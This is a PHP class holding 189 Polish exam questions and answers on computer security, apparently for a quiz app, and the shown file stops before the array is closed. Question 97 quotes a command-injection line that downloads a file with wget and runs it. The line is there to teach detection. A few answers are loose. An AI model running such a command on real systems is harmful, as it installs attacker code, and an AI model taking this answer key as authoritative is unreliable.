<?php

declare(strict_types=1);

namespace App\Actions;

class GetRandomBSSQuestion
{
    /**
     * @var array<int, array{id: int, question: string, answer: string}>
     */
    public const QUESTIONS = [
        ['id' => 1, 'question' => 'IPSec VPN wykorzystuje trzy protokoły - jakie?', 'answer' => 'AH, ESP, IKE/ISAKMP'],
        ['id' => 2, 'question' => 'Wymień trzy protokoły z których korzysta IPSec VPN.', 'answer' => 'AH, ESP, IKE'],
        ['id' => 3, 'question' => 'System NIDS zapewnia co?', 'answer' => 'Wykrywanie ataków sieciowych w chronionej sieci'],
        ['id' => 4, 'question' => 'Pole Facility w protokole syslog pozwala zdefiniować co?', 'answer' => 'Źródło generujące dane zdarzenie'],
        ['id' => 5, 'question' => 'Pole syslog, które określa źródło logu to?', 'answer' => 'Facility'],
        ['id' => 6, 'question' => 'Program Nessus/SAINT/SATAN jest czym?', 'answer' => 'Skanerem podatności'],
        ['id' => 7, 'question' => 'Nessus jest czym?', 'answer' => 'Programem skanującym podatności'],
        ['id' => 8, 'question' => 'Program Nessus jest sławnym czym?', 'answer' => 'Skanerem podatności'],
        ['id' => 9, 'question' => 'SATAN to co?', 'answer' => 'Skaner podatności sprawdzający automatycznie znane podatności (proste hasła, znane dziury w systemie operacyjnym) na danym komputerze'],
        ['id' => 10, 'question' => 'Program NMAP jest czym?', 'answer' => 'Skanerem sieciowym'],
        ['id' => 11, 'question' => 'Nmap to co?', 'answer' => 'Popularny skaner sieciowy'],
        ['id' => 12, 'question' => 'Wirus to?', 'answer' => 'Samo propagujący kod, który wymaga działania użytkownika w celu dalszego rozprzestrzeniania się'],
        ['id' => 13, 'question' => 'Wirus w większości przypadków wymaga czego w celu dokonania dalszych infekcji?', 'answer' => 'Interwencji użytkownika'],
        ['id' => 14, 'question' => 'Robak to?', 'answer' => 'Samo propagujący kod, który NIE wymaga działania użytkownika w celu dalszego rozprzestrzeniania się'],
        ['id' => 15, 'question' => 'Robak zazwyczaj replikuje się jak?', 'answer' => 'Sam, bez ingerencji użytkownika'],
        ['id' => 16, 'question' => 'Trojan to?', 'answer' => 'Oprogramowanie które wydaje się mieć pożyteczne i niegroźne funkcje lecz posiada ukryte nieznane (najczęściej groźne) osobie uruchamiającej działanie'],
        ['id' => 17, 'question' => 'Backdoor pozwala na co?', 'answer' => 'Nieskrępowany dostęp do systemu z pominięciem uwierzytelnienia'],
        ['id' => 18, 'question' => 'Ransomware to?', 'answer' => 'Sposób ataku polegający na szyfrowaniu czyjegoś dysku i żądaniu okupu'],
        ['id' => 19, 'question' => 'Shellcode jest czym?', 'answer' => 'Złośliwym kodem który wykonuje polecenia po stronie serwera, a historycznie uruchamiał powłokę'],
        ['id' => 20, 'question' => 'Tryb pracy szyfrów blokowych ECB (electronic code book) - można zrównoleglić czy nie?', 'answer' => 'Można, jednak dla takich samych bloków danych uzyskamy takie same bloki zaszyfrowane'],
        ['id' => 21, 'question' => 'Drugi tryb pracy szyfrów blokowych to CBC (cipher block chaining) - co robi?', 'answer' => 'Uzależnia szyfrogram od innych bloków, tym samym ukrywając \'naturę\' danych'],
        ['id' => 22, 'question' => 'Antyczne scytale realizują co?', 'answer' => 'Kod używający przestawienia'],
        ['id' => 23, 'question' => 'Urządzenie rotorowe to?', 'answer' => 'Enigma'],
        ['id' => 24, 'question' => 'Przykładem urządzenia rotorowego jest?', 'answer' => 'Enigma'],
        ['id' => 25, 'question' => 'Szyfr Vernama polega na czym?', 'answer' => 'Cyklicznym dodawaniu modulo klucza o tej samej długości co szyfrowana wiadomość'],
        ['id' => 26, 'question' => 'Szyfr Cezara polega na czym?', 'answer' => 'Cyklicznym dodawaniu modulo klucza do szyfrowanej wiadomości'],
        ['id' => 27, 'question' => 'Jeżeli klucz jednoznakowy to jaki szyfr?', 'answer' => 'Cezar'],
        ['id' => 28, 'question' => 'Jeżeli klucz o tej samej długości co wiadomość to jaki szyfr?', 'answer' => 'Vernam'],
        ['id' => 29, 'question' => 'Jeżeli klucz zapętlony/powtórzony to jaki szyfr?', 'answer' => 'Vigenere'],
        ['id' => 30, 'question' => 'Tryb pracy szyfrów blokowych tryb licznikowy - CTR (counter mode) - co z równoległością?', 'answer' => 'Można zrównoleglić, jednak te same bloki danych będą różne po zaszyfrowaniu'],
        ['id' => 31, 'question' => 'Szyfr z trybem ECB szyfruje jak?', 'answer' => 'Taki sam blok danych będzie takim samym blokiem zaszyfrowanym'],
        ['id' => 32, 'question' => 'Exploitem nazywamy co?', 'answer' => 'Dane, które umożliwiają bezpośrednie wykorzystanie podatności znajdującej się w atakowanym systemie'],
        ['id' => 33, 'question' => 'Grupa zainfekowanych maszyn pod kontrolą jednej osoby/organizacji to?', 'answer' => 'Botnet'],
        ['id' => 34, 'question' => 'W szyfrze hybrydowym klucz symetryczny szyfrowany jest czym?', 'answer' => 'Szyfrem asymetrycznym'],
        ['id' => 35, 'question' => 'Szyfr asymetryczny wykorzystywany jest do czego?', 'answer' => 'Szyfrowania klucza symetrycznego, natomiast dane są szyfrowane symetrycznie'],
        ['id' => 36, 'question' => 'Szyfr hybrydowy wykorzystuje jaki szyfr do zaszyfrowania wiadomości użytkownika?', 'answer' => 'Szyfr symetryczny'],
        ['id' => 37, 'question' => 'Szyfr hybrydowy polega na czym?', 'answer' => 'Przy pomocy klucza asymetrycznego szyfruje się klucz symetryczny, natomiast dane szyfrowane są przy pomocy klucza symetrycznego'],
        ['id' => 38, 'question' => 'Włączenie mechanizmu ASLR (Address Space Layout Randomization) powoduje co?', 'answer' => 'Że między innymi adres bazowy stosu oraz adres bazowy bibliotek ładowanych dynamicznie ma inną wartość po restarcie maszyny'],
        ['id' => 39, 'question' => 'Mechanizm ASLR wymusza co?', 'answer' => 'Aby pewne istotne adresy były losowane'],
        ['id' => 40, 'question' => 'DES jest algorytmem szyfrowania jakiego typu i czym powinien być zastąpiony?', 'answer' => 'Symetrycznego, nie powinien być już używany, zamiast niego należy skorzystać z AES'],
        ['id' => 41, 'question' => 'Rozwinięcie ataku typu DDoS (distributed denial of service) z 2013 roku wykorzystywało zwielokrotnienie ruchu jakiego protokołu?', 'answer' => 'UDP (DNS amplification)'],
        ['id' => 42, 'question' => 'Atak typu SMURF wykorzystuje zwielokrotnienie ruchu jakiego protokołu?', 'answer' => 'ICMP'],
        ['id' => 43, 'question' => 'Budowanie bezpiecznych sieci zgodnie z podejściem defense in depth polega na czym?', 'answer' => 'Wprowadzeniu wielu różnych mechanizmów bezpieczeństwa'],
        ['id' => 44, 'question' => 'Założenie defense in depth twierdzi co?', 'answer' => 'Że nie ma idealnych systemów i każdy można w pewnych okolicznościach przełamać'],
        ['id' => 45, 'question' => 'Skonfigurowanie dla obiektu w systemie Windows listy SACL pozwala na co?', 'answer' => 'Logowanie informacji o dostępie do danego obiektu - włączenie audytu'],
        ['id' => 46, 'question' => 'Mechanizm audytu pozwala na co?', 'answer' => 'Logowanie przez system operacyjny informacji dotyczących dostępu do wybranych zasobów'],
        ['id' => 47, 'question' => 'Atak DoS polega na czym?', 'answer' => 'Wykorzystaniu zasobów sieci lub maszyny w celu uniemożliwienia normalnej pracy użytkowników'],
        ['id' => 48, 'question' => 'Slowloris to jaki atak?', 'answer' => 'Atak DoS polegający na utrzymaniu jak największej liczby sesji serwera'],
        ['id' => 49, 'question' => 'AV = 1 000 000 PLN, EF = 60%, ARO = 5%. Ile wynosi SLE?', 'answer' => 'SLE = AV * EF = 1 000 000 * 60% = 600 000 PLN'],
        ['id' => 50, 'question' => 'AV = 1 000 000 PLN, EF = 60%, ARO = 5%. Ile wynosi ALE?', 'answer' => 'ALE = SLE * ARO = 600 000 * 5% = 30 000 PLN'],
        ['id' => 51, 'question' => 'AV = 1 000 000 PLN, EF = 80%, ARO = 2%. Ile wynosi SLE?', 'answer' => 'SLE = AV * EF = 1 000 000 * 80% = 800 000 PLN'],
        ['id' => 52, 'question' => 'AV = 1 000 000 PLN, EF = 80%, ARO = 2%. Ile wynosi ALE?', 'answer' => 'ALE = SLE * ARO = 800 000 * 2% = 16 000 PLN'],
        ['id' => 53, 'question' => 'Jak oblicza się SLE?', 'answer' => 'SLE = AV * EF'],
        ['id' => 54, 'question' => 'Jak oblicza się ALE?', 'answer' => 'ALE = SLE * ARO'],
        ['id' => 55, 'question' => 'Program Sebek umożliwia co?', 'answer' => 'Realizację systemów HoneyNet (przez śledzenie wszystkich wywołań systemowych)'],
        ['id' => 56, 'question' => 'Program Sebek - co to jest?', 'answer' => 'Program działający w jądrze systemu operacyjnego umożliwiający przechwytywanie i wysyłanie przez sieć dowolnego wywołania systemowego (np. read/write)'],
        ['id' => 57, 'question' => 'Serwis Shodan spowodował co?', 'answer' => 'Że atakujący nie musi stosować rekonesansu w celu poznania infrastruktury ofiary'],
        ['id' => 58, 'question' => 'Dzięki Shodan przestępcy nie muszą już stosować czego?', 'answer' => 'Skanowania w celu poznania infrastruktury atakowanego'],
        ['id' => 59, 'question' => 'Współczesne ataki przy uruchomieniu pierwszego załącznika na maszynie ofiary robią co?', 'answer' => 'Pobierają malware z serwera dystrybucyjnego'],
        ['id' => 60, 'question' => 'Shodan jest czym?', 'answer' => 'Internetową wyszukiwarką urządzeń podłączonych do internetu'],
        ['id' => 61, 'question' => 'CSIRT pełni takie same role jak CERT, natomiast co?', 'answer' => 'Nie wymaga certyfikacji przez Carnegie Mellon University (CMU)'],
        ['id' => 62, 'question' => 'CERT to organizacja utworzona kiedy i po czym?', 'answer' => 'W listopadzie 1988 r. przez DARPA, po incydencie z robakiem Morrisa'],
        ['id' => 63, 'question' => 'CERT/CSIRT to co?', 'answer' => 'Zespół reagujący na incydenty bezpieczeństwa'],
        ['id' => 64, 'question' => 'Atak smurf stosował zwielokrotnienie ruchu jakiego protokołu?', 'answer' => 'ICMP'],
        ['id' => 65, 'question' => 'Atak typu SYN-flooding wykorzystuje co?', 'answer' => 'Limit połączeń półotwartych (wyczerpanie puli połączeń półotwartych)'],
        ['id' => 66, 'question' => 'Atak typu XSS (Cross Site Scripting) to co?', 'answer' => 'Umieszczenie kodu HTML na stronie WWW najczęściej za pomocą błędu w sanityzacji wejścia'],
        ['id' => 67, 'question' => 'Atak return to libc/return oriented programming umożliwia przełamanie jakiego mechanizmu?', 'answer' => 'Mechanizmu niewykonywania kodu na stosie (obejście DEP)'],
        ['id' => 68, 'question' => 'Atak polegający na monitorowaniu i długim pozostawaniu w sieci to?', 'answer' => 'APT (Advanced Persistent Threat)'],
        ['id' => 69, 'question' => 'Zagrożenie typu APT polega na czym?', 'answer' => 'Długotrwałym przebywaniu w atakowanej sieci w celu wykradania informacji i zdobywania dostępu do kolejnych systemów'],
        ['id' => 70, 'question' => 'Atak man-in-the-middle pozwala na atak na jakie warstwy?', 'answer' => 'Na warstwę drugą (przepełnianie tablicy MAC) lub trzecią (DHCP, IPv4/IPv6)'],
        ['id' => 71, 'question' => 'Żeby przeciwdziałać atakom typu man-in-the-middle, trzeba co zrobić?', 'answer' => 'Dodać uwierzytelnienie pomiędzy obiema stronami'],
        ['id' => 72, 'question' => 'W celu zapewnienia integralności najczęściej wykorzystuje się co?', 'answer' => 'Kody uwierzytelniające MAC (Message Authentication Code)'],
        ['id' => 73, 'question' => 'TLS pozwala na co?', 'answer' => 'Szyfrowanie i uwierzytelnianie stron'],
        ['id' => 74, 'question' => 'Najskuteczniejszą metodą ochrony systemu uniksowego przed forkbombą jest co?', 'answer' => 'Ograniczenie maksymalnej ilości uruchomionych procesów w systemie'],
        ['id' => 75, 'question' => 'W protokole SNMP w celu pobrania wielu wartości naraz używany jest jaki komunikat?', 'answer' => 'GETBULK'],
        ['id' => 76, 'question' => 'Protokół SNMP pozwala pobierać informacje za pomocą jakich komunikatów?', 'answer' => 'GET, GETBULK, GETNEXT'],
        ['id' => 77, 'question' => 'Komunikat GETBULK protokołu SNMP umożliwia co?', 'answer' => 'Pobranie w jednym komunikacie informacji o wielu obiektach'],
        ['id' => 78, 'question' => 'Pole Severity w protokole syslog pozwala na co?', 'answer' => 'Określenie ważności logu'],
        ['id' => 79, 'question' => 'Klasa oprogramowania SIEM zajmuje się czym?', 'answer' => 'Zbieraniem logów z paru różnych miejsc i doprowadzaniem ich do wspólnego formatu'],
        ['id' => 80, 'question' => 'OSSIM należy do jakiej klasy?', 'answer' => 'SIEM'],
        ['id' => 81, 'question' => 'IPsec VPN wykorzystuje jakie dwa tryby pracy?', 'answer' => 'Tunelowy i transportowy'],
        ['id' => 82, 'question' => 'Baza MIB wykorzystywana jest przez jaki protokół i jaka jest jej struktura?', 'answer' => 'Przez protokół SNMP, informacje przechowywane są w strukturze drzewiastej'],
        ['id' => 83, 'question' => 'W protokole SNMP komunikat asynchroniczny wysyłany od agenta do stacji NMS to?', 'answer' => 'Trap'],
        ['id' => 84, 'question' => 'Komunikat TRAP protokołu SNMP pozwala na co?', 'answer' => 'Wysłanie komunikatu asynchronicznego od urządzenia monitorowanego do stacji zarządzającej'],
        ['id' => 85, 'question' => 'Komunikat trap jest wysyłany przez SNMP kiedy?', 'answer' => 'Gdy agent zgłasza nieprawidłowość'],
        ['id' => 86, 'question' => 'Zgodnie z ustawą z 5 lipca 2018 w Polsce powinny działać jakie zespoły CSIRT?', 'answer' => 'CSIRT NASK (prowadzony przez NASK), CSIRT GOV (prowadzony przez ABW) i CSIRT MON (prowadzony przez MON)'],
        ['id' => 87, 'question' => 'Narodowe Centrum Cyberbezpieczeństwa (NCC, NC CYBER) zajmuje się czym?', 'answer' => 'Wymianą informacji zagrożeń między rządem a biznesem'],
        ['id' => 88, 'question' => 'Polska platforma skupiona wokół problemów cyberbezpieczeństwa, łącząca rząd i przedsiębiorstwa to?', 'answer' => 'NCC / NC Cyber'],
        ['id' => 89, 'question' => 'Zagrożenie typu ransomware pierwszej generacji, które blokuje dostęp do komputera nazywane jest?', 'answer' => 'Winlocker'],
        ['id' => 90, 'question' => 'Zagrożenie typu ransomware drugiej generacji, które szyfruje wybrane pliki nazywane jest?', 'answer' => 'Cryptolocker'],
        ['id' => 91, 'question' => 'Mechanizm Stack canaries uniemożliwia wykonanie ataku przepełnienia bufora nawet jeśli zostanie użyta jaka technika?', 'answer' => 'ROP (Return Oriented Programming)'],
        ['id' => 92, 'question' => 'Mechanizm stack canaries umożliwia wykrycie czego?', 'answer' => 'Faktu nadpisania adresu powrotu funkcji na stosie'],
        ['id' => 93, 'question' => 'Mechanizm DEP (Data Execution Prevention) może zostać ominięty przez co?', 'answer' => 'Wykorzystanie techniki ROP'],
        ['id' => 94, 'question' => 'Jak przeciwdziałać ROP (Return Oriented Programming)?', 'answer' => 'Mechanizmem kanarków (stack canaries) i ASLR'],
        ['id' => 95, 'question' => 'Mechanizm DEP uniemożliwia co?', 'answer' => 'Wykonanie kodu maszynowego na stosie / wykonanie kodu znajdującego się w sekcji danych'],
        ['id' => 96, 'question' => 'Atak typu injection umożliwia co?', 'answer' => 'Używanie danych jako instrukcji - dane podane przez użytkownika wyłamią się z kontekstu danych i zostaną zinterpretowane jako kod'],
        ['id' => 97, 'question' => 'Co sugeruje obserwacja \'cd /var/tmp/;wget http://... -o pdflush; pdflush;\' w ruchu sieciowym skierowanym do aplikacji webowej?', 'answer' => 'Że aplikacja podatna jest na atak command injection'],
        ['id' => 98, 'question' => 'IP Spoofing to atak polegający na czym?', 'answer' => 'Sfałszowaniu adresu źródłowego wysyłanych pakietów'],
        ['id' => 99, 'question' => 'Bot może się komunikować z serwerem C&C za pomocą czego?', 'answer' => 'IRC, sieci TOR, sieci peer-to-peer lub pobierania pliku komend z serwera'],
        ['id' => 100, 'question' => 'Wykonanie instrukcji ret procesora rodziny x86 zmienia jakie rejestry?', 'answer' => 'ESP i EIP'],
        ['id' => 101, 'question' => 'Instrukcja call odpowiada za co?', 'answer' => 'Włożenie adresu powrotu na stos i skok'],
        ['id' => 102, 'question' => 'Najważniejszymi elementami certyfikatu są?', 'answer' => 'Nazwa podmiotu, klucz publiczny podmiotu oraz podpis zaufanej trzeciej strony'],
        ['id' => 103, 'question' => 'CA (Urząd certyfikacji) to co?', 'answer' => 'Techniczna realizacja zaufanej trzeciej strony'],
        ['id' => 104, 'question' => 'Skanowanie portów jest czynnością od której atakujący rozpoczyna co?', 'answer' => 'Przygotowanie do ataku, polegającą na poznaniu infrastruktury sieciowej ofiary'],
        ['id' => 105, 'question' => 'Specter i HoneyD są systemami HoneyPot jakiego typu?', 'answer' => 'Low-interaction (niskiej interakcji)'],
        ['id' => 106, 'question' => 'HoneyD to system Honeypot jakiego typu?', 'answer' => 'Niskiej interakcji'],
        ['id' => 107, 'question' => 'System HoneyPot typu low-interaction wykorzystuje co?', 'answer' => 'Programy symulujące podatności'],
        ['id' => 108, 'question' => 'Capture HPC jest jakim systemem HoneyPot?', 'answer' => 'Klienckim systemem HoneyPot'],
        ['id' => 109, 'question' => 'Systemy HoneyC i CaptureHPC to jakie systemy HoneyPot?', 'answer' => 'Klienckie systemy HoneyPot'],
        ['id' => 110, 'question' => 'Dionaea i Nepenthes są systemami HoneyPot jakiego typu?', 'answer' => 'Niskiego poziomu interakcji'],
        ['id' => 111, 'question' => 'HoneyPot wysokiej interakcji używa jakich programów?', 'answer' => 'Programów produkcyjnych (prawdziwych programów)'],
        ['id' => 112, 'question' => 'W systemach HoneyPot 2 generacji wykorzystywane są urządzenia z jakiej warstwy?', 'answer' => 'Z warstwy drugiej modelu ISO/OSI'],
        ['id' => 113, 'question' => 'Podczas ataku przepełnienia bufora na stosie atakujący nadpisuje co?', 'answer' => 'Obszar bezpośrednio sąsiadujący z buforem zawierający adres powrotu'],
        ['id' => 114, 'question' => 'Podczas ataku przepełnienia bufora na stercie atakujący nadpisuje co?', 'answer' => 'Wewnętrzne struktury sterty i wskaźnik funkcji wirtualnej obiektu'],
        ['id' => 115, 'question' => 'MD5 jest funkcją skrótu, która nie powinna być już używana, zamiast niej należy skorzystać z czego?', 'answer' => 'SHA-2'],
        ['id' => 116, 'question' => 'Mechanizm port security umożliwia co?', 'answer' => 'Kontrolę liczby urządzeń podpiętych pod port przełącznika'],
        ['id' => 117, 'question' => 'Algorytm RSA swoje bezpieczeństwo opiera na trudności rozwiązania jakiego problemu?', 'answer' => 'Rozkładu na czynniki pierwsze (faktoryzacji dużych liczb złożonych)'],
        ['id' => 118, 'question' => 'Podatność, na którą nie ma sygnatur i nie jest rozpoznawana przez IDS nazywamy?', 'answer' => 'Zero-day'],
        ['id' => 119, 'question' => 'Snort jest czym?', 'answer' => 'Oprogramowaniem NIDS działającym głównie w oparciu o reguły i sygnatury'],
        ['id' => 120, 'question' => 'Żeby było bezpiecznie należy przeprowadzać w firmie szkolenia jakiego typu?', 'answer' => 'Security Awareness'],
        ['id' => 121, 'question' => 'Algorytm Diffiego-Hellmana sprowadza się do trudności rozwiązania jakiego problemu?', 'answer' => 'Logarytmu dyskretnego'],
        ['id' => 122, 'question' => 'Algorytm Diffiego-Hellmana umożliwia co?', 'answer' => 'Uzgodnienie klucza symetrycznego na niezabezpieczonym kanale'],
        ['id' => 123, 'question' => 'Podpis cyfrowy polega na czym?', 'answer' => 'Zaszyfrowaniu skrótu wiadomości kluczem prywatnym właściciela'],
        ['id' => 124, 'question' => 'Podpis cyfrowy dodany przez urząd certyfikacji (CA) do certyfikatu strony WWW potwierdza co?', 'answer' => 'Że treść nie została zmieniona'],
        ['id' => 125, 'question' => 'W celu ochrony integralności najczęściej stosuje się co?', 'answer' => 'Kody uwierzytelnienia wiadomości (MAC)'],
        ['id' => 126, 'question' => 'Atakujący chcąc poznać infrastrukturę systemu ofiary dokonuje czego?', 'answer' => 'Skanowania'],
        ['id' => 127, 'question' => 'Jednokierunkowość to własność funkcji skrótu polegająca na czym?', 'answer' => 'Prostocie obliczenia skrótu oraz dużej trudności znalezienia wiadomości pasującej do skrótu'],
        ['id' => 128, 'question' => 'Autocertyfikat to co?', 'answer' => 'Certyfikat podpisany kluczem prywatnym skojarzonym z kluczem publicznym zawartym w nim (self-signed)'],
        ['id' => 129, 'question' => 'Autentyczność certyfikatu można sprawdzić jak?', 'answer' => 'Weryfikując zawarty w nim podpis wystawiony przez urząd certyfikacji (CA)'],
        ['id' => 130, 'question' => 'Lista CRL (Certificate Revocation List) zawiera co?', 'answer' => 'Certyfikaty, którym nie należy ufać'],
        ['id' => 131, 'question' => 'Certyfikat kwalifikowany jest certyfikatem wykonanym do czego?', 'answer' => 'Dla pary kluczy umożliwiających dokonywanie podpisów o mocy prawnej identycznej z podpisem odręcznym'],
        ['id' => 132, 'question' => 'Najpopularniejsze formaty certyfikatów są zgodne z jakimi standardami?', 'answer' => 'x.509 lub PKCS'],
        ['id' => 133, 'question' => 'ShellCode to co?', 'answer' => 'Fragment kodu maszynowego wykonywanego po celowym wykorzystaniu błędu, historycznie uruchamiał powłokę systemową'],
        ['id' => 134, 'question' => 'Strefą DMZ (Demilitarized Zone) nazywamy co?', 'answer' => 'Fragment sieci, w której umieszczone są maszyny bezpośrednio dostępne z Internetu'],
        ['id' => 135, 'question' => 'Systemy antywirusowe działające w oparciu o sygnatury wyszukują co?', 'answer' => 'W plikach znanych wzorców opisujących dane złośliwe oprogramowanie'],
        ['id' => 136, 'question' => 'AV umożliwia co?', 'answer' => 'Wykrywanie złośliwego oprogramowania między innymi na dysku twardym'],
        ['id' => 137, 'question' => 'Wadą systemów klasy HIDS jest co?', 'answer' => 'Że trzeba instalować klienta na każdej maszynie'],
        ['id' => 138, 'question' => 'Programy antywirusowe oparte o heurystykę działają w oparciu o co?', 'answer' => 'Analizę potencjalnie niebezpiecznych zachowań (podejrzanych zachowań charakterystycznych dla złośliwego oprogramowania)'],
        ['id' => 139, 'question' => 'W wyniku uruchomienia niebezpiecznego programu w środowisku sandbox uzyskuje się co?', 'answer' => 'Indicators of Compromise (IoC) - adresy domenowe itd.'],
        ['id' => 140, 'question' => 'Mechanizm DHCP Snooping między innymi uniemożliwia co?', 'answer' => 'Uruchomienie nieautoryzowanego serwera dynamicznego przydzielającego maszynom adresy'],
        ['id' => 141, 'question' => 'System NIDS to co?', 'answer' => 'System pozwalający na wykrycie ataków na danej sieci'],
        ['id' => 142, 'question' => 'Karta SIM jest jaką kartą?', 'answer' => 'Procesorową kartą elektroniczną'],
        ['id' => 143, 'question' => 'Atak CSRF (Cross-site request forgery) wykorzystuje co?', 'answer' => 'Fakt zalogowania użytkownika do atakowanej usługi - polega na wysłaniu spreparowanego URL-a, do którego przeglądarka automatycznie dodaje dane uwierzytelniające'],
        ['id' => 144, 'question' => 'Exploit typu connect-back po uruchomieniu powłoki systemowej robi co?', 'answer' => 'Łączy się w celu otrzymania dalszych rozkazów'],
        ['id' => 145, 'question' => 'MACL (Mandatory Access Control List) to co?', 'answer' => 'Lista kontroli dostępu uniemożliwiająca użytkownikowi zmianę praw dostępu do wybranych zasobów'],
        ['id' => 146, 'question' => 'OWASP (top 10) to co?', 'answer' => 'Lista podatności aplikacji webowych (OWASP to organizacja non-profit zajmująca się bezpieczeństwem aplikacji webowych)'],
        ['id' => 147, 'question' => 'Mechanizm chroot pozwala na co?', 'answer' => 'Zmianę katalogu głównego działającego procesu'],
        ['id' => 148, 'question' => 'Mechanizm setuid bit pozwala na co?', 'answer' => 'Uruchomienie programu z prawami właściciela, a nie użytkownika uruchamiającego go'],
        ['id' => 149, 'question' => 'Polityka bezpieczeństwa jest czym?', 'answer' => 'Dokumentem, w którym jasno i zwięźle wyrażono co mają osiągnąć mechanizmy zabezpieczeń'],
        ['id' => 150, 'question' => 'Zasada najmniejszych uprawnień to co?', 'answer' => 'Zasada wg. której każdy ma dostęp jedynie do tego co jest dla niego konieczne'],
        ['id' => 151, 'question' => 'Plik z uprawnieniami -r-x r-x --- - w systemie numerycznym zapiszemy jako?', 'answer' => '550'],
        ['id' => 152, 'question' => 'Plik z uprawnieniami -rwx r-x --x - w systemie numerycznym zapiszemy jako?', 'answer' => '751'],
        ['id' => 153, 'question' => 'Program chmod z atrybutem 550 ustawia jakie prawa?', 'answer' => '-(r-x)(r-x)(---) - odczyt i wykonanie dla właściciela i grupy, brak praw dla pozostałych'],
        ['id' => 154, 'question' => 'Zmiana hasła przez zwykłego użytkownika przy użyciu passwd jest możliwa dzięki czemu?', 'answer' => 'setuid bit'],
        ['id' => 155, 'question' => 'Full Disclosure to co?', 'answer' => 'Polityka ujawnienia podatności polegająca na publicznym i natychmiastowym ujawnieniu informacji o znalezionej podatności'],
        ['id' => 156, 'question' => 'Protokół CHAP (Challenge Handshake Authentication Protocol) umożliwia co?', 'answer' => 'Zdalne uwierzytelnienie użytkownika bez bezpośredniego wysyłania swojego hasła'],
        ['id' => 157, 'question' => 'Protokół CHAP pozwala na co?', 'answer' => 'Wzajemne uwierzytelnienie serwera i klienta'],
        ['id' => 158, 'question' => 'Jaki protokół pozwala na uwierzytelnianie użytkowników?', 'answer' => 'CHAP'],
        ['id' => 159, 'question' => 'Podatność to co?', 'answer' => 'Błąd w oprogramowaniu lub konfiguracji pozwalający na uzyskanie nieautoryzowanego dostępu do pewnych zasobów'],
        ['id' => 160, 'question' => 'Autoryzacja w mechanice AAA odpowiada za co?', 'answer' => 'Sprawdzenie czy użytkownik ma prawo coś zrobić'],
        ['id' => 161, 'question' => 'W architekturze AAA mechanizm uwierzytelnienia pozwala na co?', 'answer' => 'Określenie, jaki użytkownik chce użyć danych'],
        ['id' => 162, 'question' => 'Protokoły wykorzystywane w architekturze AAA to?', 'answer' => 'RADIUS, TACACS+, Diameter'],
        ['id' => 163, 'question' => 'Protokół SSL/TLS do szyfrowania danych wykorzystuje jaki typ szyfrowania?', 'answer' => 'Symetryczne'],
        ['id' => 164, 'question' => 'Przy nawiązaniu sesji SSL/TLS serwer wysyła co?', 'answer' => 'Certyfikat - klient pobiera z niego klucz publiczny i używa go do zaszyfrowania klucza sesyjnego (symetrycznego)'],
        ['id' => 165, 'question' => 'W protokole SSL/TLS klucz sesyjny jest szyfrowany czym?', 'answer' => 'Kluczem publicznym serwera'],
        ['id' => 166, 'question' => 'Script Kiddies to co?', 'answer' => 'Grupa ludzi o małym doświadczeniu i wiedzy zajmujących się atakami dla zabawy'],
        ['id' => 167, 'question' => 'Zawodowi przestępcy to osoby używające czego?', 'answer' => 'Ransomware i Exploit Kit-ów'],
        ['id' => 168, 'question' => 'Żeby przeciwdziałać atakowi typu podsłuchiwanie, trzeba co zrobić?', 'answer' => 'Szyfrować dane pomiędzy obiema stronami'],
        ['id' => 169, 'question' => 'Serwis malwr.com umożliwia co?', 'answer' => 'Uruchomienie programu w testowym środowisku (sandboxie) i rejestrację wyników testu'],
        ['id' => 170, 'question' => 'Serwis virustotal.com jest używany do czego?', 'answer' => 'Sprawdzenia oprogramowania przez kilkadziesiąt różnych silników antywirusowych'],
        ['id' => 171, 'question' => 'Aby połączyć dwa oddziały firm używa się jakiego typu VPN?', 'answer' => 'VPN Site to Site'],
        ['id' => 172, 'question' => 'Architektura VPN umożliwiająca podłączenie się pracownika do sieci to?', 'answer' => 'Remote-Access'],
        ['id' => 173, 'question' => 'Topologia VPN remote-access jest wykorzystywana w jakim celu?', 'answer' => 'Umożliwienia bezpiecznego podłączenia się pracownika zdalnego do sieci organizacji'],
        ['id' => 174, 'question' => 'Struktura danych zawierająca wszystkie istotne informacje o zabezpieczonym połączeniu to?', 'answer' => 'Security Association (SA)'],
        ['id' => 175, 'question' => 'W sieci PGP aby uzyskać podpis osób zaufanych tworzy się co?', 'answer' => 'KSP (Key Signing Party)'],
        ['id' => 176, 'question' => 'Protokół umożliwiający podjęcie decyzji co do dalszej transmisji danych klienta, najczęściej stosowany przy WiFi to?', 'answer' => '802.1x'],
        ['id' => 177, 'question' => 'Protokół 802.1x umożliwia co?', 'answer' => 'Uwierzytelnianie urządzenia podpiętego do portu przełącznika sieciowego lub punktu dostępu WIFI'],
        ['id' => 178, 'question' => 'Warszawska karta miejska jest jaką kartą?', 'answer' => 'Pamięciową kartą elektroniczną'],
        ['id' => 179, 'question' => 'HackerOne to co?', 'answer' => 'Program bugbounty'],
        ['id' => 180, 'question' => 'W celu poznania adresu shellcodu w exploicie stosuje się co?', 'answer' => 'GetPC'],
        ['id' => 181, 'question' => 'Kod jmp, jmp, call, pop realizuje co?', 'answer' => 'GetPC - czyli poznanie adresu pamięci pod którym znajduje się program'],
        ['id' => 182, 'question' => 'Procedura w exploicie wykorzystująca xor pozwala na co?', 'answer' => 'Szyfrowanie shellcode'],
        ['id' => 183, 'question' => 'Firewall umożliwia co?', 'answer' => 'Blokowanie niechcianego ruchu'],
        ['id' => 184, 'question' => 'Backdoor technika umożliwia co?', 'answer' => 'Połączenie od maszyny ofiary do atakującego i uzyskanie dostępu do powłoki'],
        ['id' => 185, 'question' => 'Infrastruktura nieprzemysłowa uznana za krytyczną przez prawo (podaj 2)?', 'answer' => 'Zaopatrzenie w żywność, zaopatrzenie w wodę'],
        ['id' => 186, 'question' => 'Do infrastruktury krytycznej w Polsce zalicza się co?', 'answer' => 'Systemy łączności, systemy sieci teleinformatycznych, sektory energetyczne, finansowe'],
        ['id' => 187, 'question' => 'Do infrastruktury krytycznej związanej z automatyką przemysłową w Polsce zalicza się (2)?', 'answer' => 'Systemy kontroli procesów przemysłowych w fabrykach, systemy kontroli procesu wytwarzania energii'],
        ['id' => 188, 'question' => 'Szyfrowanie asymetryczne może być zrealizowane przez wykorzystanie jakich problemów (podaj 3)?', 'answer' => 'Faktoryzacji, logarytmu dyskretnego, dyskretnych logarytmów na krzywych eliptycznych'],
        ['id' => 189, 'question' => 'Profil zaufany jest realizacją czego przez ePUAP?', 'answer' => 'Certyfikatu kwalifikowanego (podpisu elektronicznego)'],
